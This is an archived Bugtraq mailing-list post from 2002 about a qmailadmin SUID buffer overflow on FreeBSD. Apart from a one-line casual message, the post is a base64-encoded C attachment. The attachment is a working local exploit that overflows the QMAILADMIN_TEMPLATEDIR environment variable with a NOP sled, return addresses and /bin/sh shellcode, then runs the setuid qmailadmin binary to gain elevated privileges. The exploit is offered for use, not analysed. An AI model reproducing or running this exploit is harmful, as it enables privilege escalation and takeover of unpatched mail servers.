[26563] in bugtraq
Re: qmailadmin SUID buffer overflow
daemon@ATHENA.MIT.EDU (badc0ded)
Tue Aug 6 18:18:32 2002
Message-ID: <20020806205329.14838.qmail@securityfocus.com>
Date: Wed, 24 Jul 2002 23:05:04 GMT
From: badc0ded <badc0ded@badc0ded.com>
To: vuln-dev@securityfoucs.com
Reply-To: badc0ded@badc0ded.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="spruceJKTGZCPYHKNUTSTQPMFG"
--spruceJKTGZCPYHKNUTSTQPMFG
Content-Type: text/plain
Content-Transfer-Type: 8bit
Had nothing better to do today so attached is a FreeBSD qmailadmin exploit.
It is really ugly but does the trick. Wasnt quite bored enough to make a
pretty one, sorry :)
--spruceJKTGZCPYHKNUTSTQPMFG
Content-Type: application/octet-stream; name="qmailadmin-exp.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="qmailadmin-exp.c"
LyogaHR0cDovL3d3dy5iYWRjMGRlZC5jb20gKGJ1ZyBmb3VuZCBieSBUaG9tYXMgQ2Fubm9uKQog
LyBiYXNoLTIuMDVhJCAuL3FtYWlsYWRtaW4tZXhwCiAvIENvbnRlbnQtVHlwZTogdGV4dC9odG1s
CiAvICQgaWQKIC8gdWlkPTEwMDAoZGltKSBldWlkPTg5KHZwb3BtYWlsKSBnaWQ9MTAwMChkaW0p
IGVnaWQ9ODkodmNoa3B3KSBncm91cHM9ODkodmNoa3B3KSwgMTAwMChkaW0pLCAwKHdoZWVsKQog
LyAkIAoqLwoKCmNoYXIgc2hlbGxjb2RlW109ICAgICAgICAgIC8qIDIzIGJ5dGVzICAgICAgICAg
ICAgICAgICAgICAgICAqLwogICAgIlx4MzFceGMwIiAgICAgICAgICAgICAvKiB4b3JsICAgICVl
YXgsJWVheCAgICAgICAgICAgICAgKi8KICAgICJceDUwIiAgICAgICAgICAgICAgICAgLyogcHVz
aGwgICAlZWF4ICAgICAgICAgICAgICAgICAgICovCiAgICAiXHg2OCIiLy9zaCIgICAgICAgICAg
IC8qIHB1c2hsICAgJDB4Njg3MzJmMmYgICAgICAgICAgICAqLwogICAgIlx4NjgiIi9iaW4iICAg
ICAgICAgICAvKiBwdXNobCAgICQweDZlNjk2MjJmICAgICAgICAgICAgKi8KICAgICJceDg5XHhl
MyIgICAgICAgICAgICAgLyogbW92bCAgICAlZXNwLCVlYnggICAgICAgICAgICAgICovCiAgICAi
XHg1MCIgICAgICAgICAgICAgICAgIC8qIHB1c2hsICAgJWVheCAgICAgICAgICAgICAgICAgICAq
LwogICAgIlx4NTQiICAgICAgICAgICAgICAgICAvKiBwdXNobCAgICVlc3AgICAgICAgICAgICAg
ICAgICAgKi8KICAgICJceDUzIiAgICAgICAgICAgICAgICAgLyogcHVzaGwgICAlZWJ4ICAgICAg
ICAgICAgICAgICAgICovCiAgICAiXHg1MCIgICAgICAgICAgICAgICAgIC8qIHB1c2hsICAgJWVh
eCAgICAgICAgICAgICAgICAgICAqLwogICAgIlx4YjBceDNiIiAgICAgICAgICAgICAvKiBtb3Zi
ICAgICQweDNiLCVhbCAgICAgICAgICAgICAgKi8KICAgICJceGNkXHg4MCIgICAgICAgICAgICAg
LyogaW50ICAgICAkMHg4MCAgICAgICAgICAgICAgICAgICovCjsKCm1haW4gKCkKewogICBjaGFy
IGJ1ZlsxNjAwMF07CiAgIGludCBpOwogICBtZW1zZXQoYnVmLDAsc2l6ZW9mKGJ1ZikpOwogICBt
ZW1zZXQoYnVmLDB4OTAsNTk3Nyk7IAogICBzdHJjYXQoYnVmLHNoZWxsY29kZSk7CgogICBmb3Ig
KGk9MDtpPD0yMjAzO2krKykKICAgICBzdHJjYXQoYnVmLCJceGQ4XHhlZlx4MDZceDA4Iik7ICAg
Ly8gbGFuZ19mcyBtYWdpYy4uCiAgIHN0cmNhdCAoYnVmLCJceGYxXHhjYlx4YmZceGJmIik7CS8v
IHJldC4uCiAgIHNldGVudigiUU1BSUxBRE1JTl9URU1QTEFURURJUiIsYnVmKTsKICAgZXhlY2xw
KCIvdXNyL2xvY2FsL3d3dy9jZ2ktYmluLmRlZmF1bHQvcW1haWxhZG1pbi9xbWFpbGFkbWluIiwi
cW1haWxhZG1pbiIsMCk7CiAgIAogICAKfQo=
--spruceJKTGZCPYHKNUTSTQPMFG--
